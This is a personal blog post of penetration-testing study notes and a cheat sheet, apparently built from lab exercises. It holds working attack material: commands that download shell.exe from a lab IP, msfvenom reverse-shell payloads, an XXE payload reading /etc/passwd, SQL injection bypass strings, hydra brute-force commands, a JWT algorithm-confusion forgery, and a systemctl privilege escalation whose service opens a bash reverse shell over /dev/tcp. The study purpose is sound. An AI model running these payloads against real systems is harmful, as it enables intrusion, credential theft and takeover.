
The Road to White Hat - Useful Commands & Tips

Posted at 2020-09-15

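These are notes on my road to becoming a white hat hacker.

I have not actually become one; these are the notes I keep while studying to become one.

This time I am collecting commands and tips that are useful for pentesting, on the easygoing assumption that gathering them here might come in handy later. I therefore plan to keep updating this page as I go.

I will also list the videos and sites I used as references.
If you know of better sites or videos, please let me know.

A disclaimer up front: I am a noob, so some of the actions or option choices here may be pointless or make no sense. If you notice any, please point them out.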

Useful Commands

Windows equivalents/alternatives for Linux commands

cat

type <FILE_NAME>

wget

bitsadmin.exe /TRANSFER <job name> <remote URL> <download destination>

powershell "Invoke-WebRequest -OutFile shell.exe -Uri http://10.13.6.60:8888/shell.exe"

Invoke-WebRequest -OutFile shell.exe -Uri http://10.13.6.60:8888/shell.exe

certutil.exe -urlcache -split -f "http://10.13.6.60:8888/shell.exe" shell.exe

Search files & Show contents

Windows

dir /s *FILE_NAME*
type NAME_OF_THE_FILE

Reference:
https://qiita.com/asmin/items/d53e71ed98a377ca7823

NFS

showmount - show mount information for an NFS server

Linux

/usr/sbin/showmount

SMB

Linux

smbclient //[IP]/[SHARE]

Followed by the tags:
-U [name] : to specify the user
-p [port] : to specify the port

The following downloads a share recursively:

smbget -R smb://<ip>/anonymous

Simple HTTP Server

Python3

python3 -m http.server [port]

Check interface information (IP address, etc.)

Linux

ifconfig

Check wireless information (IP address, etc.)

Linux

iwconfig

Switch user

Linux

su

Check whether a machine responds (Ping)

Linux

ping <ip_address>
ping -c <n> <ip_address>

n: number of ping requests to send

Show the ARP cache

Linux

arp [-a] <host_name>

-a: display in BSD style
https://youtu.be/qlK174d_uu8?t=3797

Check listening ports

Linux

netstat [-ano]

Show the routing table

Linux

route

Run a command with administrator privileges

Linux

sudo

Start/stop the web server

Linux

service apache2 start
service apache2 stop

To have it start automatically at boot:

systemctl enable apache2

Start/stop the SSH server

Linux

service ssh start
service ssh stop

To have it start automatically at boot:

systemctl enable ssh

dig/ whois

tctrace

Check which users belong to a specific group

getent group

Way to crack SQLite databases

kali@kali:~/ダウンロード$ sqlite3 webapp.db 
SQLite version 3.33.0 2020-08-14 13:23:32
Enter ".help" for usage hints.
sqlite> .tables
sessions  users   
sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite> select * from users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite> 

XXE Payload example

<!DOCTYPE replace [<!ENTITY name "feast"> ]>
 <userInfo>
  <firstName>falcon</firstName>
  <lastName>&name;</lastName>
 </userInfo>

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

Check permissions

Windows

icacls

Creating Hex Dump

Linux

xxd -p <FILE_NAME> | tr -d "\n"

File Download wget

Windows

certutil.exe -urlcache -split -f http://10.13.6.60:80/win.exe

Useful Tips

Where user information is stored

Linux

/etc/passwd

Where password hashes are stored

Linux

/etc/shadow

sudo configuration (sudoers)

explanations

Payload Generator

msfvenom

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=[vpnIP] LPORT=[LPORT] -f exe -o reverse.exe

then run the following

> msfconsole

and

> use exploit/multi/handler

msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

-p <payload>         payload
lhost=<LOCAL_HOST>   local host IP address
lport=<LOCAL_PORT>   the port to listen on
R                    export the payload in raw format

msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

-f <format>    Specifies the output format. In this case that is an executable (exe).
-o <file>      The output location and filename for the generated payload.
LHOST=<IP>     Specifies the IP to connect back to.
LPORT=<port>   The port on the local machine to connect back to.

getuid

Display the created time, access time, modified time, and entry modified time of the file

timestomp <FILE_NAME> -v

Key logger

keyscan_start

and

keyscan_dump

Metasploit

Search for vulnerability

search cve:2009 type:exploit platform:-linux

How to add modules from exploit db

Where authentication and privilege-related events are logged

Linux

/var/log/auth.log

SQL Injection Tips

Login bypass

Commonly used

' or true --
') or true--
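
The login-bypass strings above only work when input is concatenated into the SQL text. The following is an added example (not from the original article) using Python's sqlite3 and the users table layout from the SQLite session earlier on this page; the rows, passwords and function names are constructed for illustration.

```python
import hashlib
import sqlite3


def _digest(password):
    # Stand-in for the app's password hashing; a real app would use a salted, slow KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """In-memory table with the same columns as the users table shown earlier."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userID TEXT NOT NULL, username TEXT NOT NULL, "
        "password TEXT NOT NULL, admin INT NOT NULL)"
    )
    rows = [  # constructed sample rows
        ("u1", "admin", _digest("constructed-admin-pw"), 1),
        ("u2", "Alice", _digest("constructed-alice-pw"), 0),
    ]
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", rows)
    return conn


def login_concatenated(conn, username, password):
    """Injectable pattern: user input becomes part of the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + _digest(password) + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL caused by the input
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, _digest(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or true --"  # first string from the list above
    print("concatenated :", login_concatenated(db, payload, "x"))
    print("parameterized:", login_parameterized(db, payload, "x"))
    print("real login   :", login_parameterized(db, "Alice", "constructed-alice-pw"))
```

With the concatenated query the WHERE clause becomes `username = '' or true`, so the first row (admin) is returned without a password; the bound version looks for a user literally named `' or true --` and finds none.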

Blind SQLi

?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+

Note: 115 is 's' in ASCII. If there's no obvious error, it indicates that the first letter of the database name is 's'.

UNION SQLi

UNION SQLi attack consists of 3 stages:

  • Finding the number of columns
  • Checking if the columns are suitable
  • Attack and get some interesting data.

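Finding the number of columns

Repeat 'ORDER BY', increasing the index by 1 each time, until an error occurs. The value just before the error is the number of columns.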

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--

UNION SELECT attack
Repeat the 'UNION SELECT' payload with NULLs, adding one NULL each time, until an error occurs. The number of NULLs just before the error is the number of columns.

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

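Note: for Oracle, use ' UNION SELECT NULL FROM DUAL--. The reason is that in Oracle every SELECT statement must use the FROM keyword. DUAL is a built-in Oracle table.

Checking for data types that can be abused
Data that can be abused is often stored with a string data type. On that assumption, after finding the number of columns, look for columns that are string or string-compatible.

As shown below, try string data (here 'a') in each column position in turn, once per column. If no error occurs, that column is a string or a compatible data type.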

' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--

Other data that is often useful:

  • database()
  • user()
  • @@version
  • username
  • password
  • table_name
  • column_name

Reference:
https://portswigger.net/web-security/sql-injection/union-attacks

Tools

Linpeas

A tool that gathers, in one go, the information likely to be useful for Linux privilege escalation.

SQLMap

Tips

Use Burp Suite output

sqlmap -r filename --dbms=mysql --dump

Identify the hash type from a hash

online

Python

Identify by prefix

GoBuster(Brute-force URIs, DNS subdomains, virtual host names)

gobuster dir -u http://example.com -w wordlist.txt -x php,txt,html

kali@kali:~$ gobuster --help
Usage:
  gobuster [command]

Available Commands:
  dir         Uses directory/file brutceforcing mode
  dns         Uses DNS subdomain bruteforcing mode
  help        Help about any command
  vhost       Uses VHOST bruteforcing mode

Flags:
  -h, --help              help for gobuster
  -z, --noprogress        Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist

Use "gobuster [command] --help" for more information about a command.

wfuzz (Fuzzing)

Fuzzing can apparently be described as a fancy form of brute force.

Fuzzing is using security tools to automate the input of data we provide into things such as websites or software applications. Fuzzing is an extremely effective process as computers can perform laborious actions like trying to find hidden files/folders, try different usernames and passwords much quicker than a human can (and is willing to do...)

wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt localhost:80/FUZZ/note.txt

kali@kali:~$ wfuzz -h

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
*                                                      *
* Version up to 1.4c coded by:                         *
* Christian Martorella (cmartorella@edge-security.com) *
* Carlos del ojo (deepbit@gmail.com)                   *
*                                                      *
* Version 1.4d to 2.4.5 coded by:                      *
* Xavier Mendez (xmendez@edge-security.com)            *
********************************************************

Usage:  wfuzz [options] -z payload,params <url>

        FUZZ, ..., FUZnZ  wherever you put these keywords wfuzz will replace them with the values of the specified payload.
        FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.


Options:
        -h                        : This help
        --help                    : Advanced help
        --version                 : Wfuzz version details
        -e <type>                 : List of available encoders/payloads/iterators/printers/scripts

        -c                        : Output with colors
        -v                        : Verbose information.
        --interact                : (beta) If selected,all key presses are captured. This allows you to interact with the program.

        -p addr                   : Use Proxy in format ip:port:type. Repeat option for using various proxies.
                                    Where type could be SOCKS4,SOCKS5 or HTTP if omitted.

        -t N                      : Specify the number of concurrent connections (10 default)
        -s N                      : Specify time delay between requests (0 default)
        -R depth                  : Recursive path discovery being depth the maximum recursion level.
        -L, --follow              : Follow HTTP redirections

        -u url                    : Specify a URL for the request.
        -z payload                : Specify a payload for each FUZZ keyword used in the form of type,parameters,encoder.
                                    A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
                                    Encoders category can be used. ie. url
                                    Use help as a payload to show payload plugin's details (you can filter using --slice)
        -w wordlist               : Specify a wordlist file (alias for -z file,wordlist).
        -V alltype                : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
        -X method                 : Specify an HTTP method for the request, ie. HEAD or FUZZ

        -b cookie                 : Specify a cookie for the requests
        -d postdata               : Use post data (ex: "id=FUZZ&catalogue=1")
        -H header                 : Use header (ex:"Cookie:id=1312321&user=FUZZ")
        --basic/ntlm/digest auth  : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"

        --hc/hl/hw/hh N[,N]+      : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
        --sc/sl/sw/sh N[,N]+      : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
        --ss/hs regex             : Show/Hide responses with the specified regex within the content

CrackStation (for cracking password hashes)

Maltego (information gathering)

https://www.maltego.com/
Can automatically gather information about a target from publicly available information.

Explanatory video
https://youtu.be/zemNLx0-LRw

Reverse shells

PHP

/usr/share/webshells/php/php-reverse-shell.php

Others

Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

The impacket that comes installed on Kali Linux is apparently broken(?), and it seems it has to be uninstalled (purged) first.

apt purge *impacket*
cd <directory to install into>
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .

How to get a list of hosts that respond to ping (shell)

Script (ipsweep.sh)

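#!/bin/bash
# Ping sweep of a /24: prints the addresses that answer one echo request.

if [ "$1" == "" ]
then
    echo "You forgot an IP address!"
    echo "Syntax: ./ipsweep.sh 192.168.1"
else
    for ip in $(seq 1 254); do
        # Each ping runs in the background; keep only the replying address.
        ping -c 1 "$1.$ip" | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
    done
    wait  # let the background pings finish before the script exits
fi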

How to run

chmod +x ipsweep.sh
./ipsweep.sh <network address prefix (first three octets)>

(Example)
./ipsweep.sh 192.168.1 > iplist.txt

iplist.txt is later used as the target list for nmap.

hashcat

Fast password cracker, accelerated by GPU

tmux

Tplmap

Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.

The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests.

LinEnum

LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root.

Anonymous net surfing

Proxy Switcher

Easy to switch proxy servers
https://www.proxyswitcher.com/

cyber ghost VPN

VPN service
https://www.cyberghostvpn.com/en_US/

others

Tor (https://www.torproject.org)
Burp Suite (https://www.portswigger.net)
Hotspot Shield (https://www.hotspotshield.com)
Proxifier (https://www.proxifier.com)
Charles (http://www.charlesproxy.com)
Fiddler (http://www.telerik.com)
Protoport Proxy Chain (http://www.protoport.com)
ProxyCap (http://www.proxycap.com)
Module

GTFOBins

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

Have I Been Pwned

Check if you have an account that has been compromised in a data breach

OSINT

Namechk

WhatsMyName

NameChekup

sherlock

Script for insecure deserialization (OWASP Top 10 vulnerability)

explanation Python Pickle module

dirb

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.

DIRB comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists. Also DIRB sometimes can be used as a classic CGI scanner, but remember is a content scanner not a vulnerability scanner.

DIRB main purpose is to help in professional web application auditing. Specially in security related testing. It covers some holes not covered by classic web vulnerability scanners. DIRB looks for specific web objects that other generic CGI scanners can’t look for. It doesn’t search vulnerabilities nor does it look for web contents that can be vulnerables.

dirbuster

wordlist

nikto

cheat sheet

kali@kali:~$ nikto -h http://10.10.147.61:1234/manager/html -id bob:bubbles

XSRFProbe

XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a powerful crawling engine and numerous systematic checks, it is able to detect most cases of CSRF vulnerabilities, their related bypasses and further generate (maliciously) exploitable proof of concepts with each found vulnerability. For more info on how XSRFProbe works, see XSRFProbe Internals on wiki.

Nessus

Vulnerability scanning tool.
A free version is also available.
https://www.tenable.com/products/nessus

Enum4Linux

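A tool for enumerating SMB on both Windows and Linux systems.

It is basically a wrapper around the tools in the Samba package, and makes it easy to quickly extract information from SMB-related targets.

Installed by default on Kali Linux.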

Official Download

SecLists (collection of common usernames, passwords (default passwords), URLs, etc.)

SecLists is a collection of common lists including usernames, passwords, URLs and much more.

hydra (online password cracking tool)

syntax

hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp

SECTION                 FUNCTION
hydra                   Runs the hydra tool
-t 4                    Number of parallel connections per target
-l [user]               Points to the user whose account you're trying to compromise
-P [path to dictionary] Points to the file containing the list of possible passwords
-vV                     Sets verbose mode to very verbose, shows the login+pass combination for each attempt
[machine IP]            The IP address of the target machine
ftp / protocol          Sets the protocol

kali@kali:~$ hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.35.24 ssh
hydra -l <username> -P <full path to pass> 10.10.217.219 -t 4 ssh
hydra -l <username> -P <wordlist> 10.10.217.219 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

Breaking RSA cryptography

IDS (Intrusion Detection System) and IPS (Intrusion Prevention System)

Suricata

Snort

Firewall

pfsense

Reverse Engineering

Radare2

ILSpy

This is for .NET
https://github.com/icsharpcode/ILSpy

Dotpeek

This is for .NET
https://www.jetbrains.com/decompiler/

Kerberos

Kerbrute

Bruteforce Kerberos, Active Directory

Rubeus

C# toolset for raw Kerberos interaction and abuses.

Kerberoasting w/ Impacket

Prerequisite: the attacking user must be a Service Account.

sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.191.46 -request

AS-REP roasting

Prerequisite: the attacking user must have pre-authentication disabled. (Unlike Kerberoasting, it is not required to be a Service Account.)

Reference

PowerView Cheat Sheet

https://gist.github.com/HarmJ0y/3328d954607d71362e3c
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

SQL injection

Explanations and related articles

SQLMap Cheat Sheet

JWT (JSON Web Token)

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA

Decode it, since it is Base64-encoded.

{"typ":"JWT","alg":"RS256"}{"iss":"Paradox","iat":1610454239,"exp":1610454359,"data":{"pingu":"noots"}}

Change the algorithm from RS256 to HS256 and re-encode it.

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA

Convert the public key to hex so that openssl can use it.

$ cat public.pem | xxd -p | tr -d "\\n"
2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a  

Generate HMAC signature by supplying our public key as ASCII hex and with the token.

$ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDg4Mzg2LCJleHAiOjE2MTA0ODg1MDYsImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ" |
 openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a
(stdin)= d46b02fd2a91fbc68a0d946f6b9e5f1a9659c1902fedc39f7f05ae0ba7b12971

Convert signature (Hex to "base64 URL")

$ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('d46b02fd2a91fbc68a0d946f6b9e5f1a9659c1902fedc39f7f05ae0ba7b12971')).replace('=','')\")"
1GsC_SqR-8aKDZRva55fGpZZwZAv7cOffwWuC6exKXE
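
Why the re-signed token above gets accepted, and the check that stops it, as an added example that is not part of the original article: a verifier that takes the algorithm from the token's own header checks an HS256 token using the public key bytes as the HMAC secret, while a verifier pinned to RS256 rejects it. The toy RSA key, PUBLIC_KEY_BYTES (a stand-in for public.pem) and all function names are assumptions made for this demo.

```python
import base64
import hashlib
import hmac
import json

# Constructed toy RSA key from two Mersenne primes: demo only, never real use.
P, Q, E = 2**521 - 1, 2**607 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))      # private exponent (Python 3.8+)
K = (N.bit_length() + 7) // 8          # modulus length in bytes
# Stand-in for the public.pem bytes that the page feeds to openssl as the HMAC key.
PUBLIC_KEY_BYTES = f"{N:x}:{E:x}".encode()
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj):
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def pkcs1_v15_encode(message):
    """EMSA-PKCS1-v1_5 encoding of SHA-256(message), as used by RS256."""
    digest_info = SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    return b"\x00\x01" + b"\xff" * (K - len(digest_info) - 3) + b"\x00" + digest_info


def issue_rs256(claims):
    """Server side: sign header.payload with the RSA private exponent."""
    signing_input = encode_part({"typ": "JWT", "alg": "RS256"}) + "." + encode_part(claims)
    em = int.from_bytes(pkcs1_v15_encode(signing_input.encode()), "big")
    return signing_input + "." + b64url(pow(em, D, N).to_bytes(K, "big"))


def hs256_with_public_key(claims):
    """The page's altered token: alg set to HS256, HMAC keyed with the public key bytes."""
    signing_input = encode_part({"typ": "JWT", "alg": "HS256"}) + "." + encode_part(claims)
    mac = hmac.new(PUBLIC_KEY_BYTES, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(mac)


def signature_ok(alg, signing_input, sig):
    if alg == "RS256":
        if len(sig) != K:
            return False
        em = pow(int.from_bytes(sig, "big"), E, N).to_bytes(K, "big")
        return hmac.compare_digest(em, pkcs1_v15_encode(signing_input))
    if alg == "HS256":
        # The same "key" is reused as an HMAC secret: this is the confusion.
        mac = hmac.new(PUBLIC_KEY_BYTES, signing_input, hashlib.sha256).digest()
        return hmac.compare_digest(mac, sig)
    return False


def verify(token, allowed_algs):
    """Return the claims when the signature verifies under an allowed alg, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
        alg = header["alg"]
    except (ValueError, TypeError, KeyError):
        return None
    if not isinstance(alg, str) or alg not in allowed_algs:
        return None  # rejected before any key is touched
    if not signature_ok(alg, (header_b64 + "." + payload_b64).encode(), sig):
        return None
    return json.loads(b64url_decode(payload_b64))


def verify_trusting_header(token):
    return verify(token, {"RS256", "HS256"})  # alg is chosen by the token: flawed


def verify_pinned(token):
    return verify(token, {"RS256"})  # the service only ever issues RS256


if __name__ == "__main__":
    claims = {"iss": "Paradox", "data": {"pingu": "noots"}}
    legit, altered = issue_rs256(claims), hs256_with_public_key(claims)
    for name, check in (("trusting header", verify_trusting_header),
                        ("pinned to RS256", verify_pinned)):
        print(name, "| RS256 token:", check(legit) is not None,
              "| HS256 token:", check(altered) is not None)
```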

Brute force the secret

For HS256, brute-forcing the secret is possible since HS256 is a symmetric algorithm.

Cross-Site Scripting (XSS)

Explanations and related articles

https://developers.google.com/web/fundamentals/security/csp
https://www.hacksplaining.com/exercises/xss-stored

Cheat sheet

SSRF (Server-Side Request Forgery)

Bypass filters.

http://[::]:3306 or
http://:::3306

IDOR (Insecure Direct Object Reference)

IDOR is the act of exploiting a misconfiguration in the way user input is handled, to access resources you wouldn't ordinarily be able to access.

Rainbow Table Attack

Explanations and related articles

Reverse Shell

What is it?

snippet for PHP

Cheat sheet

ICMP Shell

MIME Sniffing

Explanations and related articles

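  • Can lead to XSS vulnerabilities
  • Can be a loophole even when CSP (Content-Security-Policy) is configured
  • Depends on browser behaviour

What should we do

  • Set the Content-Type header of the HTTP response correctly
  • Set the X-Content-Type-Options header to nosniff (nosniff is the only value that can be set)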

CSRF (Cross-site Request Forgery)

Explanations and related articles

Google Dorks

Finding exploits! (CVE - Common Vulnerabilities and Exposures)

NVD

CVE numbering format: CVE-YEAR-ID
Example: CVE-2020-13955

Exploit DB

https://www.exploit-db.com/
Exploits can be downloaded here.

On Kali Linux, the searchsploit tool can search Exploit DB.

CVE Mitre

AttackerKB

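XSS Payloads library

Checklist of things to look at first when attempting privesc

Gather information with LinEnum

  • Are there any kernel vulnerabilities?
  • Are read/write permissions on sensitive files misconfigured?
  • Is there anything with SUID/SGID that can be used as root (owned by root, the root group, etc.)?
  • Have you checked what sudo -l allows? (vi runnable as root, NOPASSWD settings, etc.)
    (vi runnable with root privileges → run vi, then ":!sh" gives a shell with root privileges)
  • Can any suspicious crontab commands, or ones that run as root, be used? (cron runs as root)
  • Who has root privileges?
  • Can PATH be rewritten? (overwrite PATH to change where an SUID binary loads from)

Example: find files with SUID set

find / -perm -u=s -type f 2>/dev/null

Example: create an /etc/passwd entry (password field) (MD5)

openssl passwd -1 -salt [salt] [password]

Privesc via cron (by wildcard)

Useful checklist

When systemctl turns out to have SUID set

If systemctl has SUID set, privilege escalation to root is possible (by reverse_shell).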

kali@kali:~$ cat root.service 
[Unit]
Description=roooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.13.6.60/5555 0>&1'

[Install]
WantedBy=multi-user.target
kali@kali:~/ダウンロード/php-reverse-shell-master$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.13.6.60] from (UNKNOWN) [10.10.28.226] 39414
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 04:22:53 up 3 min,  0 users,  load average: 0.02, 0.05, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /tmp
$ wget http://10.13.6.60:6666/root.service
--2020-11-15 04:23:30--  http://10.13.6.60:6666/root.service
Connecting to 10.13.6.60:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 166 [application/octet-stream]
Saving to: 'root.service'

     0K                                                       100%  557K=0s

2020-11-15 04:23:31 (557 KB/s) - 'root.service' saved [166/166]

$ /bin/systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
$ /bin/systemctl start root

How HTTPS works

What is Enumeration?

Payload Cheat Sheet

SMTP Enum

use metasploit's 'smtp_enum'

Example:

msf6 auxiliary(scanner/smtp/smtp_version) > search smtp_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/smtp/smtp_enum                   normal  No     SMTP User Enumeration Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_enum

msf6 auxiliary(scanner/smtp/smtp_enum) > options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                            Required  Description
   ----       ---------------                                            --------  -----------
   RHOSTS     10.10.35.24                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      25                                                         yes       The target port (TCP)
   THREADS    1                                                          yes       The number of concurrent threads (max one per host)
   UNIXONLY   true                                                       yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /home/kali/SecLists/Usernames/top-usernames-shortlist.txt  yes       The file that contains a list of probable users accounts.

MySQL Enum

msf6 > search mysql_sql

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/admin/mysql/mysql_sql                   normal  No     MySQL SQL Generic Query


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_sql

msf6 auxiliary(admin/mysql/mysql_sql) > options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
